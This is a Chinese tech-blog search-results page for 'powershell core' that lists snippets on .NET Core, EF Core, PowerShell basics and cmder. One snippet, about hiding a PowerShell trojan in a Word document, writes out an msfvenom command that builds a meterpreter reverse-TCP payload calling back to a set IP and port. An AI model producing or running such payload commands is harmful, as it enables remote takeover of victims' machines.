码迷,mamicode.com
首页 >  
搜索关键字:powershell core    ( 20546个结果
.ef-core-数据库迁移命令
https://blog.csdn.net/SpuerCheng/article/details/80398766 ...
分类:数据库   时间:2021-03-26 15:34:15    阅读次数:0
ef core 迁移命令的使用 生成数据库和表
https://blog.csdn.net/weixin_43817709/article/details/90236511 ...
分类:数据库   时间:2021-03-26 15:33:39    阅读次数:0
IdentityServer4 快速入门7:使用EntityFramework Core进行配置和运营数据
https://www.jianshu.com/p/f9a6cde6c6d8 ...
分类:其他好文   时间:2021-03-26 15:32:34    阅读次数:0
asp.net core 添加创建读取配置文件appsettings帮助类
直接上代码: 需要引用using Microsoft.Extensions.Configuration; public class AppSettings { /// <summary> /// 配置文件的根节点 /// </summary> private static readonly ICon ...
分类:移动开发   时间:2021-03-26 15:23:11    阅读次数:0
关于powershell 的一些基本使用
#获取当前目录下的所有.proto 的文件信息 ls *.proto -r | % versioninfo #将当前文件夹下的 proto 文件复制到c盘的proto 文件夹 Copy-Item .\*\*.proto C:\proto -Recurse ...
分类:系统相关   时间:2021-03-26 15:22:26    阅读次数:0
ASP.NET CORE 实体类映射 AUTOMAPPER
ASP.NET CORE 3.1 1.首先nuget中安装程序包 2.创建继承profile的MappingProfile文件 配置实体类映射(oaEmployee 实体类字段要必须与表中字段一致,testdatamodel 最好与实体类字段一致,如果不一致需添加转换的字段 例: .ForMembe ...
分类:移动开发   时间:2021-03-26 15:22:15    阅读次数:0
.net core api 接收参数
1.HttpGet请求 ①.一点参数 [HttpGet] public string TestGet(string name) { return name; } ②.一些参数(Test是自定义实体接收参数类) [HttpGet] public string TestGet([FromQuery] T ...
分类:Windows程序   时间:2021-03-26 15:13:56    阅读次数:0
ASP .NET CORE 连接mysql数据库
项目目录 1. nuget安装Pomelo.EntityFrameworkCore.MySql 2.appsettings添加数据库连接信息 MySQLDbConnectionString 3.新增继承DbContext类 添加实体类名称 实体类 4.在start.up类ConfigureServi ...
分类:数据库   时间:2021-03-26 15:13:41    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
cmder配置
cmder介绍 简介 windows10中常用的命令行终端有cmd,powershell。其它需手动安装的终端有git bash(对于git命令),xshell(对于ssh连接远程主机附带linux命令) 集成多种终端,实现高效开发的命令行工具cmder,可以实现cmd,git,ssh,linux多 ...
分类:其他好文   时间:2021-03-18 14:03:40    阅读次数:0
20546条   上一页 1 ... 19 20 21 22 23 ... 2055 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!